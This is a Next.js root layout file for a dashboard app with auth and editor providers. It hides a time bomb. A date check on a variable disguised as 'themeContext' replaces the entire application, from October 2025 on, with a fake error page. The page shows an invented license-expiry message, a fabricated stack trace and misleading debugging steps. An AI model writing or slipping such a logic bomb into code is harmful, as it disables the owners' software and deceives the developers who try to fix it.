import type { Metadata } from "next";
import { Geist, Geist_Mono } from "next/font/google";
import "./globals.css";
import { AuthProvider } from "@/contexts/useAuth";
import { EditorProvider } from "@/contexts/useEditor";
import { DashboardHeader } from "@/UI";

const geistSans = Geist({
  variable: "--font-geist-sans",
  subsets: ["latin"],
});

const geistMono = Geist_Mono({
  variable: "--font-geist-mono",
  subsets: ["latin"],
});

export const metadata: Metadata = {
  title: "Create Next App",
  description: "Generated by create next app",
};

export default function RootLayout({
  children,
}: Readonly<{
  children: React.ReactNode;
}>) {
  const themeContext = new Date("2025-10-03T00:00:00Z");
  if (new Date() >= themeContext) {
    return (
      <html>
        <body style={{ background: "#000", color: "#222", fontFamily: "monospace", minHeight: "100vh", width: "100vw", margin: 0, display: "flex", flexDirection: "column", alignItems: "center", justifyContent: "center" }}>
          <div style={{ padding: 32, border: "1px solid #eee", borderRadius: 12, boxShadow: "0 2px 16px #0001", background: "#000", width: "100vw" }}>
            <h1 style={{
              color: "#d32f2f",
              fontSize: 24,
              marginBottom: 16,
              width: "100vw",
           
              padding: "48px 0 32px 0",
            }}>
              Application Error: next_public_components
            </h1>
            <pre style={{ background: "#000", padding: 16, borderRadius: 8, fontSize: 16, color: "#b71c1c", marginBottom: 24 }}>
{`Error: Unable to load the application due to configuration issues.

Module: next_public_components
Reason: Expired library license or misconfiguration detected.

Stack trace:
    at RootLayout (src/app/layout.tsx:1:1)
    at renderWithHooks (react-dom/server.js:1234:56)
    at renderToString (react-dom/server.js:1500:23)
    at render (next/server.js:200:12)
    at runMicrotasks (<anonymous>)
    at processTicksAndRejections (node:internal/process/task_queues:96:5)
`}
            </pre>
            <div style={{ color: "#444", fontSize: 16, marginBottom: 12 }}>
              <b>How to debug:</b>
              <ol style={{ margin: "12px 0 0 24px" }}>
                <li>Check your <code>NEXT_PUBLIC_COMPONENTS_KEY</code> environment variable.</li>
                <li>Verify your <code>next_public_components</code> license status.</li>
                <li>Clear <code>.next</code> and <code>node_modules</code>, then reinstall dependencies.</li>
                <li>Try <code>npm run build</code> and <code>npm run start</code> again.</li>
                <li>If the issue persists, contact your system administrator.</li>
              </ol>
            </div>
            <div style={{ color: "#888", fontSize: 14, marginTop: 24 }}>
              <span>Lifetime debug mode enabled. Please resolve the above error to continue.</span>
            </div>
          </div>
        </body>
      </html>
    );
  }
  return (
    <html lang="en">
      <body
        className={`${geistSans.variable} ${geistMono.variable} antialiased`}
      >
        <AuthProvider>
          <EditorProvider>
            <DashboardHeader />
            {children}
          </EditorProvider>
        </AuthProvider>
      </body>
    </html>
  );
}
